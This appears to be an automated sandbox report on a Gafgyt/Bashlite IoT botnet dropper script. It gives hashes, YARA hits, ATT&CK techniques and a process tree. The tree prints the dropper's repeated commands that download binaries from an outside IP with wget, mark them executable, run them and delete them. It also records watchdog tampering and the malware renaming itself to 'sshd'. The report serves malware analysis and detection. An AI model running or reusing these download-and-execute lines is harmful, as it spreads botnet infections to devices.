gafgyt | ad54fc11ccdbac99d10fd5c5b38eaaa680677ee3832425f35230fc9ac09b631f

Analysis

max time kernel
146s
max time network
144s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
05-01-2025 06:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

1KB
MD5

3556efaeedbc73136a9b2628ea6002b6
SHA1

2c4795c1553f260dbb662b883dddaae6eee48f54
SHA256

ad54fc11ccdbac99d10fd5c5b38eaaa680677ee3832425f35230fc9ac09b631f
SHA512

7bab0772028c781d292d5676bf57e25f247bde34a4ddc4ac60585db666f7666ce1153eff5db289c85c62e791d3e31aed06d455ff02cae5cc35e9d08e5816117b

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 14 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_gafgyt
behavioral4/files/fstream-2.dat	family_gafgyt
behavioral4/files/fstream-3.dat	family_gafgyt
behavioral4/files/fstream-4.dat	family_gafgyt
behavioral4/files/fstream-5.dat	family_gafgyt
behavioral4/files/fstream-6.dat	family_gafgyt
behavioral4/files/fstream-7.dat	family_gafgyt
behavioral4/files/fstream-8.dat	family_gafgyt
behavioral4/files/fstream-9.dat	family_gafgyt
behavioral4/files/fstream-10.dat	family_gafgyt
behavioral4/files/fstream-11.dat	family_gafgyt
behavioral4/files/fstream-12.dat	family_gafgyt
behavioral4/files/fstream-13.dat	family_gafgyt
behavioral4/files/fstream-14.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
732	chmod
804	chmod
859	chmod
772	chmod
797	chmod
813	chmod
737	chmod
745	chmod
840	chmod
864	chmod
869	chmod
849	chmod
854	chmod
874	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/a	733	a
/tmp/b	738	b
/tmp/c	747	c
/tmp/d	774	d
/tmp/e	798	e
/tmp/g	805	g
/tmp/h	815	h
/tmp/i	841	i
/tmp/l	850	l
/tmp/s	855	s
/tmp/t	860	t
/tmp/u	865	u
/tmp/x	870	x
/tmp/y	875	y

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	e
File opened for modification	/dev/misc/watchdog	e

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	e

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	sshd	798	e

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	e

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/c	wget
File opened for modification	/tmp/u	wget
File opened for modification	/tmp/g	wget
File opened for modification	/tmp/s	wget
File opened for modification	/tmp/e	wget
File opened for modification	/tmp/i	wget
File opened for modification	/tmp/l	wget
File opened for modification	/tmp/h	wget
File opened for modification	/tmp/t	wget
File opened for modification	/tmp/x	wget
File opened for modification	/tmp/y	wget
File opened for modification	/tmp/a	wget
File opened for modification	/tmp/b	wget
File opened for modification	/tmp/d	wget

/tmp/wget.sh
/tmp/wget.sh
1⤵
PID:703
- /usr/bin/wget
  wget http://176.119.150.11/a
  2⤵
  - Writes file to tmp directory
  PID:706
- /bin/chmod
  chmod +x a
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/a
  ./a
  2⤵
  - Executes dropped EXE
  PID:733
- /bin/rm
  rm -rf a
  2⤵
  PID:735
- /usr/bin/wget
  wget http://176.119.150.11/b
  2⤵
  - Writes file to tmp directory
  PID:736
- /bin/chmod
  chmod +x b
  2⤵
  - File and Directory Permissions Modification
  PID:737
- /tmp/b
  ./b
  2⤵
  - Executes dropped EXE
  PID:738
- /bin/rm
  rm -rf b
  2⤵
  PID:740
- /usr/bin/wget
  wget http://176.119.150.11/c
  2⤵
  - Writes file to tmp directory
  PID:741
- /bin/chmod
  chmod +x c
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/c
  ./c
  2⤵
  - Executes dropped EXE
  PID:747
- /bin/rm
  rm -rf c
  2⤵
  PID:749
- /usr/bin/wget
  wget http://176.119.150.11/d
  2⤵
  - Writes file to tmp directory
  PID:751
- /bin/chmod
  chmod +x d
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/d
  ./d
  2⤵
  - Executes dropped EXE
  PID:774
- /bin/rm
  rm -rf d
  2⤵
  PID:776
- /usr/bin/wget
  wget http://176.119.150.11/e
  2⤵
  - Writes file to tmp directory
  PID:777
- /bin/chmod
  chmod +x e
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/e
  ./e
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:798
- /bin/rm
  rm -rf e
  2⤵
  PID:802
- /usr/bin/wget
  wget http://176.119.150.11/g
  2⤵
  - Writes file to tmp directory
  PID:803
- /bin/chmod
  chmod +x g
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/g
  ./g
  2⤵
  - Executes dropped EXE
  PID:805
- /bin/rm
  rm -rf g
  2⤵
  PID:807
- /usr/bin/wget
  wget http://176.119.150.11/h
  2⤵
  - Writes file to tmp directory
  PID:808
- /bin/chmod
  chmod +x h
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/h
  ./h
  2⤵
  - Executes dropped EXE
  PID:815
- /bin/rm
  rm -rf h
  2⤵
  PID:818
- /usr/bin/wget
  wget http://176.119.150.11/i
  2⤵
  - Writes file to tmp directory
  PID:819
- /bin/chmod
  chmod +x i
  2⤵
  - File and Directory Permissions Modification
  PID:840
- /tmp/i
  ./i
  2⤵
  - Executes dropped EXE
  PID:841
- /bin/rm
  rm -rf i
  2⤵
  PID:845
- /usr/bin/wget
  wget http://176.119.150.11/l
  2⤵
  - Writes file to tmp directory
  PID:846
- /bin/chmod
  chmod +x l
  2⤵
  - File and Directory Permissions Modification
  PID:849
- /tmp/l
  ./l
  2⤵
  - Executes dropped EXE
  PID:850
- /bin/rm
  rm -rf l
  2⤵
  PID:852
- /usr/bin/wget
  wget http://176.119.150.11/s
  2⤵
  - Writes file to tmp directory
  PID:853
- /bin/chmod
  chmod +x s
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /tmp/s
  ./s
  2⤵
  - Executes dropped EXE
  PID:855
- /bin/rm
  rm -rf s
  2⤵
  PID:857
- /usr/bin/wget
  wget http://176.119.150.11/t
  2⤵
  - Writes file to tmp directory
  PID:858
- /bin/chmod
  chmod +x t
  2⤵
  - File and Directory Permissions Modification
  PID:859
- /tmp/t
  ./t
  2⤵
  - Executes dropped EXE
  PID:860
- /bin/rm
  rm -rf t
  2⤵
  PID:862
- /usr/bin/wget
  wget http://176.119.150.11/u
  2⤵
  - Writes file to tmp directory
  PID:863
- /bin/chmod
  chmod +x u
  2⤵
  - File and Directory Permissions Modification
  PID:864
- /tmp/u
  ./u
  2⤵
  - Executes dropped EXE
  PID:865
- /bin/rm
  rm -rf u
  2⤵
  PID:867
- /usr/bin/wget
  wget http://176.119.150.11/x
  2⤵
  - Writes file to tmp directory
  PID:868
- /bin/chmod
  chmod +x x
  2⤵
  - File and Directory Permissions Modification
  PID:869
- /tmp/x
  ./x
  2⤵
  - Executes dropped EXE
  PID:870
- /bin/rm
  rm -rf x
  2⤵
  PID:872
- /usr/bin/wget
  wget http://176.119.150.11/y
  2⤵
  - Writes file to tmp directory
  PID:873
- /bin/chmod
  chmod +x y
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/y
  ./y
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm -rf y
  2⤵
  PID:877

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a

Filesize
93KB

MD5
b062e74dd216b96e8573bb71bb6156a0

SHA1
a903e99874d58fa1f799daa23b0af83508b0f4e1

SHA256
ae3cbe9f45318d384a1b884c0c78bf7529dcd4d3f8411d40046bb6f926af109b

SHA512
425e4cb13cc55e2bdb20af671f8f39795f6d57172a77f0b001dbba8f22793985cda48ae015101bf9b0b23c7f3e4b776bb75424fb28fac79f1750c1906afa9f34

Download Submit
/tmp/b

Filesize
108KB

MD5
220ce404a1b630ee9ac6d040b808bc8a

SHA1
52c19820ebc5fe07cd9f7a007c6576ac5216c956

SHA256
01f9c04efb37e80965cc9a0f7382b0e60588d3ab627f1d22d38ff121a861c98b

SHA512
ab3c414d3e2c5111fd5052737eb05dfbd74fa882fbf0dc0aba9c1f80cc3bf6b1fd954b28c23c1847fc2cbf087a5515ad90c4a02931d7472c13a84a9521d1d59c

Download Submit
/tmp/c

Filesize
110KB

MD5
da45b6801748e9d3cc98c40f38562818

SHA1
046cbf55b0f9ab61def454731ba586eb6ac7c1b6

SHA256
20326bcf9cc77e86bd96c372349fb1ffe0b04aa6a200eb81fefe3c28a9fc315f

SHA512
1b25ebc90744e6fa44d909ddc111e78cdd1b22f3fff32223c085f620657c2a7a3c09459b08da2f853a842217b46ae58525511097a8544903e23b6af17636e7e9

Download Submit
/tmp/d

Filesize
121KB

MD5
7d8109f34970487eec948588fa67e679

SHA1
6dac660ba07326ce38f0d7d590b095aa63af028f

SHA256
9221c5b3323f5cff014fd9c2fb858e63945912c6248caca5f81e43b056bd0359

SHA512
db9bc9819318be915668fceb4db750acd7f51d6c3753da105e07a52d6d8d978c35cf49580cb34bc0ad98578f7e260695a8703c10531f06435da2c8f33a7e965b

Download Submit
/tmp/e

Filesize
152KB

MD5
5360c6adb7962ba1a526469abed0f1af

SHA1
1459135c35df53c199d0557089ba4c622a4bc65e

SHA256
e86ab9e0cf4d0ca7fa8bd43a02338ed01ace773016d8d28f7702e6678593e5ef

SHA512
c15fea3a4368f27375d2082146f85f9269cec609160b4c87101ae8714ba039aa463762a21827e6d687d7ba4fdc4396e50f6d73880a9a88144caa51b178f7cc70

Download Submit
/tmp/g

Filesize
123KB

MD5
67368d39577c3731c4517eb594f4754f

SHA1
37b27a28c471e24187925bfe8ed352f10ceca62f

SHA256
3d7ee58ec3ecc34e90c40d596b79d88d8a53e773c03e3f2a1f25be629154c6cd

SHA512
62128da0f1e92e0542ed60098ac93bd7314142737cd0340c5c41af2d60ddabf6b81131b261d73120067ec7b272c9815d251ab904fdf9c0e4f8851589bf620f5f

Download Submit
/tmp/h

Filesize
152KB

MD5
e5892b347dd9d2b6246a80e17dfcda0f

SHA1
9692de7cc50debfac5e679370220b32599ed4d5b

SHA256
82b0c31bb093dd6c92ad8fab0f068215e12fcd02fa4c1bb7cdbdce5c000d5681

SHA512
289972361b7ede68484956189e2e7f5739aec73e8a5ea33679add17b78a7bdd003886767d5362f17fb467398ceaa74222390ac16623d35a050e57bf8b1972d0a

Download Submit
/tmp/i

Filesize
110KB

MD5
f1656392490c70b06fa2aff4d4dff6e1

SHA1
89644ae8f0c60b41a843c6cdd616d3d0b499e5d4

SHA256
891feb538f9b5dc3c1dd22024347d8bcdc6b34998b53a4a7a60db9a3ecc4d5d9

SHA512
ee351590263d7df46e1b308400ac73a97b754423b858c64a5cdf004d70f872fc71b868ee9cecabcf115bbeb18951bc3313c80918cde2837edc79b90ffa5103fb

Download Submit
/tmp/l

Filesize
103KB

MD5
b32a6c58a36557b105d4367d22a82955

SHA1
869e605dae3b713b37ebfd6e9bebf42f5236b275

SHA256
3698dbc2248139d92bd1926473d62cf0725e98aca0e53559135a1a03ff3eca29

SHA512
461302d82e9183d19f50d2521ecbe904915923a2a67aeefd4d9552c13310758466af8781b60fbd67f8c70c0d8dc824ee6c03de99bb4beabbe850234514fe9f73

Download Submit
/tmp/s

Filesize
135KB

MD5
09748a86923870171d1821e84a4ae778

SHA1
b583e96c59f11380bf6286904cb925c279f16378

SHA256
ea358ee792f3c08a4b8c34cf10d1c04c9003c13d21d195d348173aa78ec4c75c

SHA512
9b2cc8d791b76c901c290792161b104ea006587bb5b4d6d9595327c269c0c9bda02bbe0bd215fd1e916f029eea7a66a0c05b9fd157313b46f43e111eeee05fb6

Download Submit
/tmp/t

Filesize
172KB

MD5
5eac14dfbadebe0e62d714bee8a873d0

SHA1
51a2ef104a64a21edfbebe3f1294ed7bb3605b59

SHA256
bfa0d7d433c1e0a5a89554d466294fc66bf83acc1b5284f6d9378f1870d4d642

SHA512
79a0bf584ee548d34e775ee0e7f8e95b0167d275c430aa2f19bdcfcd88f32f6e6d4b90655911407b64b3c49906bf346ca8fb56b33b0b806f68d00de5afc86e5b

Download Submit
/tmp/u

Filesize
95KB

MD5
616ec606badd89e9ad5f37d1cc550bcd

SHA1
3b24f4c1d4998aaeacaf11dc902c61094e842e38

SHA256
429d59e9d2fc07b7ad088c63999d268899655e648e2dcc8fea6846829a3a6438

SHA512
32b234e5c49ba2143f64e8096e3596c5b45761e3a9e58fff35ae72e4f8b5dcc99a2f074d51cb7aefe1ef1ca930a3fe29078ccd38846244b16c6c2f33fb1a599f

Download Submit
/tmp/x

Filesize
93KB

MD5
3a078fe36abfe3386a34eec8367c6b7b

SHA1
28885d5c254ff4cbd8d54e08f4bd611a45c9e4da

SHA256
ac03cbaace321ca3c832198ead3fbd9626533080a2a3908945c24d1ca0ff89e4

SHA512
359a9a5df8ab20e7c50e07aa760dc71949ea7a6d87a4f15a75ca747ad832a456dd6db11c4e52acba42a7e2946aa759ee90f01e2a3a9721b07119ac62770d536a

Download Submit
/tmp/y

Filesize
114KB

MD5
1411e0bacb1ac56f9edf16957c546053

SHA1
7fc4f176fca6c238d5a8119efa6a1b85e543464f

SHA256
d44134f23992a676ebb950df914e852bf32036f9cc5189f856c72e87b6672b92

SHA512
f7f9ee3815728ea475785c481b2c330a25990b1b60ab8f4142c5923c020a66822fef2686e1c8b8fbd6a1c5e99e7d1ff61b14dc5591127be23a053fd2e6c4e0f2

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads